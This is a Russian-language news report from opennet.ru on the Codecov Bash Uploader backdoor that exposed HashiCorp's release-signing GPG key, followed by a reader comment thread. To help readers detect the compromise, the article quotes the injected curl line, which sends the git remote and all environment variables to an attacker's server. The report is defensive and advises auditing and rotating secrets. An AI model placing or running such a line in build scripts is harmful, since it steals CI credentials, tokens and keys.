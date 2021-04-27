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Внедрение вредоносного кода в скрипт Codecov привело к компрометации PGP-ключа HashiCorp

27.04.2021 08:57

Компания HashiCorp, известная разработкой открытых инструментариев Vagrant, Packer, Nomad и Terraform, объявила об утечке закрытого GPG-ключа, используемого для создания цифровых подписей, верифицирующих релизы. Атакующие, получившие доступ к GPG-ключу, потенциально могли внести скрытые изменения в продукты HashiCorp, заверив их корректной цифровой подписью. При этом компания заявила, что в ходе проведённого аудита следов попыток внесения подобных модификаций не выявлено.

В настоящее время скомпрометированный GPG-ключ отозван и вместо него введён в обиход новый ключ. Проблема затронула только верификацию при помощи файлов SHA256SUM и SHA256SUM.sig, и не коснулась формирования цифровых подписей для Linux-пакетов DEB и RPM, поставляемых через releases.hashicorp.com, а также механизмы подтверждения выпусков для macOS и Windows (AuthentiCode).

Утечка произошла из-за использования в инфраструктуре скрипта Codecov Bash Uploader (codecov-bash), предназначенного для загрузки coverage-отчётов из систем непрерывной интеграции. В ходе атаки на компанию Codecov в указанный скрипт был скрыто внедрён бэкдор, через который была организована отправка паролей и ключей шифрования на сервер злоумышленников.

Для взлома инфраструктуры Codecov атакующие воспользовались ошибкой в процессе создания Docker-образа, позволявшей извлечь данные для доступа к GCS (Google Cloud Storage), необходимые для внесения изменений в скрипт Bash Uploader, распространявшийся с сайта codecov.io. Изменения были внесены ещё 31 января, два месяца оставались незамеченными и позволяли злоумышленникам извлекать информацию, хранимую в окружениях систем непрерывной интеграции клиентов. При помощи добавленного вредоносного кода злоумышленники могли получить информацию о тестируемом Git-репозитории и всех переменных окружения, в том числе включающих токены, ключи шифрования и пароли, передаваемые в системы непрерывной интеграции для организации доступа к коду приложений, хранилищам и сервисам, таким как Amazon Web Services и GitHub.

Кроме прямого вызова скрипт Codecov Bash Uploader использовался в составе других загрузчиков, таких как Codecov-action (Github), Codecov-circleci-orb и Codecov-bitrise-step, пользователи которых также подвержены проблеме. Всем пользователям codecov-bash и связанных с ним продуктов рекомендовано провести аудит своих инфраструктур, а также же поменять пароли и ключи шифрования. Проверить наличие бэкдора в скрипте можно по наличию в нём строки 


    curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://<IP-сервера-атакующих>/upload/v2 || true


  1. Главная ссылка к новости (https://discuss.hashicorp.com/...)
  2. OpenNews: Red Hat и Google представили Sigstore, сервис для криптографической верификации кода
  3. OpenNews: Атака на зависимости позволила выполнить код на серверах PayPal, Micrоsoft, Apple, Netflix, Uber и ещё 30 компаний
  4. OpenNews: Атаковавшие SolarWinds смогли получить доступ к коду Microsoft
  5. OpenNews: Вредоносное ПО, поражающее NetBeans для внедрения бэкдоров в собираемые проекты
  6. OpenNews: Уязвимость в прошивках BMC-контроллеров, затрагивающая серверы многих производителей
Лицензия: CC-BY
Тип: Проблемы безопасности
Короткая ссылка: https://opennet.ru/55032-codecov
Ключевые слова: codecov, backdoor, supplychain
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение (27) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Анонин (?), 10:01, 27/04/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Бывает
     
     
  • 2.4, Леголас (ok), 10:33, 27/04/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    никогда же нет, но вот опять
     
     
  • 3.6, Анонин (?), 10:39, 27/04/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Лоровцы пожаловали


     
     
  • 4.18, Аноним (-), 13:37, 27/04/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    > Лоровцы пожаловали

    гони из ссанными тряпками опять на лор

     
     
  • 5.21, Анонин (?), 13:49, 27/04/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    -20 тебе, однозвездочный
     

  • 1.2, Аноним (2), 10:03, 27/04/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +4 +/
    Вот заслуживает уважения за то что не скрывают. Асус помнится распространял подписанную его ключом малварь через сервисы обновления (чья операция?).
     
     
  • 2.17, Массоны Рептилоиды (?), 13:14, 27/04/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Что уж там скрывать, наша операция была.
     

  • 1.3, пох. (?), 10:27, 27/04/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +3 +/
    доскер, gcs, curl | sudo su
    все пароли от всего плейнтекстом потому что как же ж иначе скрипт сможет их использовать.
    Модная современная разработка, continuous degradation.

    Почему я и не удивлен?

     
     
  • 2.5, Леголас (ok), 10:35, 27/04/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    > Модная современная разработка, continuous degradation

    с точки зрения двигателей прогресса: главное, что не стагнация, или «устаревание технологий» (:

     
  • 2.7, richman1000000 (ok), 10:42, 27/04/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    > continuous degradation

    это прям в точку. Даже добавить ничего не могу

     
     
  • 3.13, Леголас (ok), 11:25, 27/04/2021 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    > Даже добавить ничего не могу

    и не надо, просто наградите автора славным зелёным +

     
  • 2.19, Аноним (-), 13:42, 27/04/2021 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    > Модная современная разработка

    а чё не так?
    жсы, питоны, котлины, ява и ой-ой-ой-какие-нагруженные-перегруженные-сервисы-ой-ой-ёй, бэкэнды головного мозга, андройды, докеры, ой-ой-ёй-какие-высокие-пороги-вхождения-в-малокультурную-нижеплинтусную-разработку...

    зато за этот фаршмак платят норм... так и живём...

     
  • 2.23, Аноним (23), 13:58, 27/04/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Проблема вызвана случайной публикацией пароля, доскер, gcs, curl | sudo su к ней в общем-то не имеют отношения
     

  • 1.8, Аноним (8), 10:47, 27/04/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –2 +/
    Используйте vault говорили они...
     
     
  • 2.24, Аноним (23), 14:00, 27/04/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Если бы Codecov использовал vault то вероятно не опубликовал бы пароль
     

  • 1.9, lockywolf (ok), 10:59, 27/04/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +3 +/
    Отличная новость, в которой такой старый пердун как я понял единственное слово: GPG.

    О чём вообще речь? Кто все эти люди, и что делают их классные продукты?

     
     
  • 2.11, Штыбель (?), 11:03, 27/04/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    С возвращением в мир победившего DevOps'а.
    Облака, Докер-Пакер, Непрерывная интеграция, все дела...
     
     
  • 3.14, Леголас (ok), 11:27, 27/04/2021 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    хочу обратно в анабиоз
     
  • 3.26, анонн (ok), 14:13, 27/04/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    > Облака, Докер-Пакер, Непрерывная интеграция,

    ... горы шкурок от бананаов, оглушающие крики "Уг-уг! Аг-аг-аг-а-а!", из гигансткой кучи экскрементов виднеется часть  исполинской статуи Древних Предтеч -  гигантская рука, сжимающая не менее гигантский факел ...

     
  • 2.20, Аноним (-), 13:45, 27/04/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    > Кто все эти люди, и что делают их классные продукты?

    болото нынешней it макулатуры

     

  • 1.10, Аноним (10), 11:02, 27/04/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    SaaS-ификация разработки от-SaaS-ла
     
  • 1.12, Аноним (12), 11:12, 27/04/2021 Скрыто модератором [﹢﹢﹢] [ · · · ]
    		• –4 +/
     
  • 1.15, mos87 (ok), 11:35, 27/04/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    Когда вебота встречает DevУпс и они заменяют моск
     
  • 1.16, Аноним (16), 12:20, 27/04/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Нагородили фигни со своими докерами, теперь страдают.
     
  • 1.22, Аноним (-), 13:50, 27/04/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    > для взлома инфраструктуры атакующие воспользовались
    > ошибкой в процессе создания Docker-образа

    бесценно...

     
     
  • 2.25, Аноним (23), 14:01, 27/04/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Чем именно? Точно такая же ошибка может быть и при создании iso или rpm или deb или чего угодно.
     

  • 1.27, Аноним (27), 14:15, 27/04/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Университет Миннесоты теперь ложит докеры?
     

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